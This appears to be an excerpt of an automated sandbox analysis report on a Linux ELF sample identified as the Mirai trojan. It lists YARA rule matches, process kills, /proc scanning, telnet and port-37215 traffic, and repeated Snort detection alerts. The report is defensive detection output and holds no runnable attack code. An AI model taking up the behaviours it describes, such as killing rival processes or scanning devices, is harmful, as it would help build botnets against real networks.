    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 794, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 806, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 853, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 888, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 940, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 1299, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 1300, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 2955, result: successfulJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)SIGKILL sent: pid: 2956, result: successfulJump to behavior
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
    Source: t0X9iGR3pD.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
    Source: 5578.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
    Source: 5576.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
    Source: 5585.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
    Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@2/0
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3760/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3761/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2672/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1583/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3244/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3120/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3361/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3759/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3239/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1577/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1610/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/512/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1299/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3235/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/514/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/519/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2946/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/917/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3758/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/5552/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/5553/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3134/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1593/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3011/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3094/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2955/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3406/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1589/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3129/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1588/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/5709/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3402/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3125/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3246/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3245/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/767/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/800/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/888/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/801/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/769/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/803/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/806/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/807/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/928/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2956/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/5685/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3420/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/490/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3142/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1635/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1633/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1599/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3139/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1873/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1630/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3412/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/657/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/658/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/659/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/418/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/419/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1639/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1638/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3398/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1371/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3392/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/780/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/660/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/661/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/782/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1369/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3304/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3425/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/785/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1642/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/940/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/941/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1640/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3147/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3268/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1364/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/548/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1647/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/5584/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2991/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1383/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1382/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1381/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/791/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/671/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/794/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1655/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/795/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/674/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1653/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/797/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/2983/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3159/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/678/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1650/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3157/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/679/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3674/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/1659/exeJump to behavior
    Source: /tmp/t0X9iGR3pD.elf (PID: 5584)File opened: /proc/3319/exeJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49250
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49280
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49346
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49356
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49374
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49378
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49386
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49400
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49420
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 49476
    Source: unknownNetwork traffic detected: HTTP traffic on port 55230 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54888 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 54888
    Source: unknownNetwork traffic detected: HTTP traffic on port 44280 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 44280
    Source: unknownNetwork traffic detected: HTTP traffic on port 39084 -> 37215

    Stealing of Sensitive Information

    barindex
    Yara detected Mirai
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality

    barindex
    Detected Mirai
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
    Source: TrafficSnort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
